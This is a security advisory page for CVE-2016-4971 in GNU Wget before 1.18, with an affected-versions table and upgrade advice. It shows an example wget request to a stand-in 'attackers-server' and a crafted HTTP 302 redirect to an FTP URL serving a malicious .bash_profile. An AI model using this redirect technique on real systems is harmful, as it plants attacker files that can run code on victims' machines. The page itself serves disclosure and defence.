First published: Tue Jun 07 2016(Updated: )
GNU Wget (including the latest version) when supplied with a malicious website link can be tricked into saving an arbitrary remote file supplied by an attacker, with arbitrary contents and filename under the current directory. This can lead to potential code execution by creating system scripts (such as .bash_profile and others) within home directory as well as other unauthorized actions (such as request sniffing by proxy modification, or arbitrary system file retrieval) by uploading .wgetrc configuration file. Because of lack of sufficient controls in wget, when user downloads a file with wget, such as: wget <a href="http://attackers-server/safe_file.txt">http://attackers-server/safe_file.txt</a> An attacker who controls the server could make wget create an arbitrary file with arbitrary contents and filename by issuing a crafted HTTP 30X Redirect containing ftp server reference in response to the victim's wget request. For example, if the attacker's server replies with the following response: HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=UTF-8 Location: <a href="ftp://attackers-server/.bash_profile">ftp://attackers-server/.bash_profile</a> Content-Length: 262 Server: Apache wget will automatically follow the redirect and will download a malicious .bash_profile file from a malicious FTP server. It will fail to rename the file to the originally requested filename of 'safe_file.txt' as it would normally do, in case of a redirect to another HTTP resource with a different name. Because of this vulnerability, an attacker is able to upload an arbitrary file with an arbitrary filename to the victim's current directory.
Credit: secalert@redhat.com
Affected Software | Affected Version | How to fix |
---|---|---|
Wget | <1.18 | |
Ubuntu | =12.04 | |
Ubuntu | =14.04 | |
Ubuntu | =15.10 | |
Ubuntu | =16.04 | |
Oracle Solaris and Zettabyte File System (ZFS) | =10 | |
Oracle Solaris and Zettabyte File System (ZFS) | =11.3 | |
Palo Alto Networks PAN-OS | >=6.1.0<=6.1.16 | |
Palo Alto Networks PAN-OS | >=7.0.0<=7.0.14 | |
Palo Alto Networks PAN-OS | >=7.1.0<=7.1.9 |
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
CVE-2016-4971 has been classified as a medium severity vulnerability due to its potential for exploitation through malicious website links.
To fix CVE-2016-4971, you should update GNU Wget to version 1.18 or later.
Exploitation of CVE-2016-4971 can lead to unauthorized saving of arbitrary remote files, which may lead to code execution.
CVE-2016-4971 affects several versions of GNU Wget and specific versions of Ubuntu Linux and Oracle Solaris.
A possible workaround for CVE-2016-4971 is to avoid downloading files from untrusted or suspicious websites.